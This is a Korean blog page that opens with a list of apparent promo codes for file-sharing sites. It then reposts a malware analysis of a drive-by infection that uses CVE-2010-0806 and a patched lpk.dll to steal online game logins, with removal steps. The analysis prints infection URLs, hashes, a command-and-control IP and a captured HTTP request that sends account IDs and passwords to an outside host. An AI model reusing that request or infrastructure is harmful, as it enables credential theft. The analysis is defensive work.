애플파일
100750040-114365102
100750040-114343741
100750040-114341602

 


에어파일
15155177034061 
15155177129944 
15155176911948 

 

파일노리
N4952X95649S3672
N6523QV5496K6491
N981222182411982


제트파일
168111574164468521
727929591911718866
468996441192462316

 

오디스크
02001887-10349042
02001886-81672307
02001885-46919253

 

파일독
 42501860-56533773
 42501858-18806386
 42501859-84410789


하이디스크
 530001937-687802890
 530001936-974320721
 530001938-888533025

 

파일매니아
 ZNS8-U9TP-5362
 3242-BPN2-M5QX
 8V5S-3PH6-T26R

 

프루나
 Z9TJ-P3285Y
 Z9TJ-P3285S
 Z9TJ-P3286W


티디스크
 09307573-66586686
 09307572-53207759
09307571-23314569


파일조
 40002442-53022620
 40002440-51547099
 40002441-99801431


예스파일
 TYQ63G5937
 TYQ6JT3K45
 TYQ7BG9546


파일함
 09802416-42438122
 09802417-04365165
 09802418-09178769


투투디스크
 9102441-6370184
 9102442-2791787
 9102440-9537445


에이드라이브
 A9072441-60995504
 A9072442-26864863
 A9072440-30761195

 

저작자표시 비영리 변경금지

'나름 의미 있던 날들... > 놀기~' 카테고리의 다른 글

나름 수익모델 연구소 !!!!  (0) 2012.06.22
무료 팩스 수신번호를 주네요. 닷네임코리아에서  (0) 2012.04.11
비탄의 아리아 10권 퍼즐 완성 !!! 경축  (2) 2012.01.14
로또475회당첨번호 미성년자 이지만 로또에 대해 알아봅시다..이제 몇일 뒤면 로또가 또 열리네요.  (0) 2012.01.04
새해맞이 일출,일몰 시간을 알아보자 !  (0) 2012.01.01


오늘은 악성코드에 대해 알아보겠습니다.

온라인 게임과 더불어 다른 게임의 계정을 해킹하는 코드들입니다.

잘보고 따라해주시기 바랍니다.

ws2help.dll 시스템 파일을 패치 -> 온라인 게임 계정 탈취 파일들

벌새님이 너무 정리를 잘해주셨습니다.

출처 : http://hummingbird.tistory.com/3033

주말을 이용하여 웹하드 등 국내 유명 사이트들이 제로데이(0-Day) 취약점으로 추정되는 악성코드로 인하여 보안 패치가 완벽하게 이루어진 시스템에서도 자동 감염이 이루어질 수 있는 부분을 발견하였습니다.


Windows 7 + Internet Explorer 9 환경에서 악의적으로 변조된 인터넷 사이트에 접속할 경우 사용자 계정 컨트롤(UAC) 기능을 통해 사용자 몰래 다운로드되어 실행되려는 scvhost.exe 파일의 허용 여부를 묻는 창이 생성되는 것을 확인할 수 있습니다.

만약 Window XP + Internet Explorer 8 환경에서는 위와 같은 UAC 보안 기능이 없으므로 해킹된 인터넷 사이트에 접속하는 동작만으로 자동으로 감염되는 것을 확인하였으며, 감염 후 자동으로 웹 브라우저가 종료되는 현상이 발생하는 현상도 있습니다.


만약 해당 창에서 사용자가 [예] 버튼을 클릭할 경우 감염으로 연결이 이루어지며, [아니요]를 클릭할 경우에는 [C:\Users\(사용자 계정)\AppData\Local\Temp\Low\scvhost.exe] 파일을 찾아 수동으로 삭제하시면 됩니다.

참고로 scvhost.exe(MD5 : 92a8a413f2597e737920db00f20768c0) 파일에 대해서는 nProtect 보안 제품에서 Trojan/W32.Agent.83490 (VirusTotal : 17/42) 진단명으로 진단되고 있으며, 알약(ALYac) 2.0 보안 제품에서는 Trojan.Dropper.OnlineGames.mi32 진단명으로 진단됩니다.


[악성코드 유포 경로 및 진단 정보]

h**p://174.1**.224.**/help.html
 ㄴh**p://174.1**.224.**/main.swf
h**p://174.1**.224.**/ad.html
 ㄴ h**p://174.1**.224.**/bin.html :: CVE-2010-0806 취약점
   ㄴ h**p://174.1**.224.**/help.txt(암호화) -> scvhost.exe

main.swf (MD5 : b45163febcc2a91950a636bac5369c11)
 - nProtect : Trojan-Exploit/W32.SWFlash.3824.IZ (VirusTotal : 1/42)

bin.html
 - nProtect : Script-JS/W32.Agent.CEC (VirusTotal : 12/42)

유포되는 사이트에서는 2개의 악성 스크립트 파일을 통해 Internet Explorer 웹 브라우저의 CVE-2010-0806 취약점과 Adobe Flash Player 취약점을 이용하는 것으로 보입니다.

하지만 해당 보안 패치가 이루어진 환경에서도 Windows XP 환경에서는 자동 감염이 이루어지고, Windows 7 환경에서도 정상적으로 파일 다운로드가 된다는 점에서 알려지지 않은 새로운 Adobe Flash Player 취약점이 포함되어 있는 것이 아닌가 추정됩니다.

[생성 폴더 / 파일 등록 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
C:\WINDOWS\system32\2011612204611.dll :: 해당 파일은 2011(Random 9~10자리 숫자).dll 유형, lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk32.dll :: lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk.dll :: lpk.dll 패치 파일(악성 파일), 변경 전 파일 크기 - 22,016 Bytes / 변경 후 파일 크기 - 33,586,058 Bytes
[생성 파일 진단 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
 - MD5 : 3C6B2938356F9AB3D406538BD6228FEE
 - Hauri ViRobot : Trojan.Win32.PSWIGames.33598862

C:\WINDOWS\system32\lpk.dll
 - MD5 : 13E9EE212FBFB0263309F87054958A34
 - AhnLab V3 : Trojan/Win32.OnlineGameHack


해당 악성코드에 감염된 PC는 정상적인 lpk.dll(Language Pack) 파일을 패치하여 lpk32.dll 파일로 백업을 하고, 악성 lpk.dll 파일은 정상적인 시스템 파일처럼 다양한 프로세스에 추가되어 사용자의 눈을 속이고 있습니다.

악성 lpk.dll 파일은 기존의 유사한 감염 방식으로 꾸준하게 발견되고 있으며, 국내 온라인 게임 피망, 넷마블, 메이플스토리, 던전앤파이터 등의 계정 정보를 탈취할 수 있습니다.

GET /ooo/net/mail.asp?a1=1&a3=(넷마블 ID)&a4=(비밀번호) HTTP/1.1
User-Agent: WinInet
Host: www.iiiigame.com
Cache-Control: no-cache

실제 감염된 환경에서 넷마블 사이트에서 로그인을 시도할 경우 미국(USA)에 위치한 174.128.224.107 서버로 계정 정보를 이메일을 통해 전송하는 동작을 확인할 수 있습니다.

만약 보안 제품으로 문제가 해결되지 않는 분들은 다음과 같은 절차에 따라 수동으로 해결하시기 바랍니다.

먼저 모든 프로그램을 종료한 상태에서 다음의 폴더, 파일을 수동으로 삭제하시기 바랍니다.

  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
  • C:\WINDOWS\system32\2011(Random 9~10자리 숫자).dll

다음으로는 lpk.dll 파일의 확장자명을 다음과 같이 변경합니다.

  • C:\WINDOWS\system32\lpk.dll → C:\WINDOWS\system32\lpk.dll-

사용자가 악성 lpk.dll 파일의 확장자를 변경하면 윈도우 파일 보호(WFP) 기능으로 자동으로 정상적인 lpk.dll 파일이 복원되므로 참고하시기 바랍니다.

파일 확장자를 변경한 후에는 반드시 시스템 재부팅을 한 후, 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\lpk32.dll
  • C:\WINDOWS\system32\lpk.dll-

위와 같이 문제를 해결한 후에는 반드시 유명 보안 제품을 이용하여 시스템 정밀 검사를 하시기 바라며, 온라인 게임 해킹 예방을 위해 본인이 이용하시는 온라인 게임 계정 비밀번호를 변경하시기 바랍니다.

이번 사례의 경우에는 보안 패치가 잘 이루어진 환경에서도 자동 감염이 예상되므로 매우 주의하시기 바라며, 악성코드를 유포하는 인터넷 사이트는 되도록 이용하지 않도록 하시는 것이 차후에도 유사한 공격을 예방할 수 있는 방법입니다.


저작자표시 비영리 변경금지

'기계들 > 컴퓨터' 카테고리의 다른 글

이번에 사려는 컴퓨터를 찾아 보았다.!! ㅠㅠ 환율  (0) 2011.09.30
인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 [출처] 인텔 아이비브릿지 아키텍처 및 스펙 추가정보 공개 (Ever Coms Club [PC견적, 윈도우 오류, PC조립, PC정보, 친목]) |작성자 패록  (0) 2011.09.19
샌디브릿지 후속 제품 아이비 브릿지  (0) 2011.09.19
오늘은 i7 샌디브릿지 -E 대해..  (0) 2011.09.16

+ Recent posts

티스토리툴바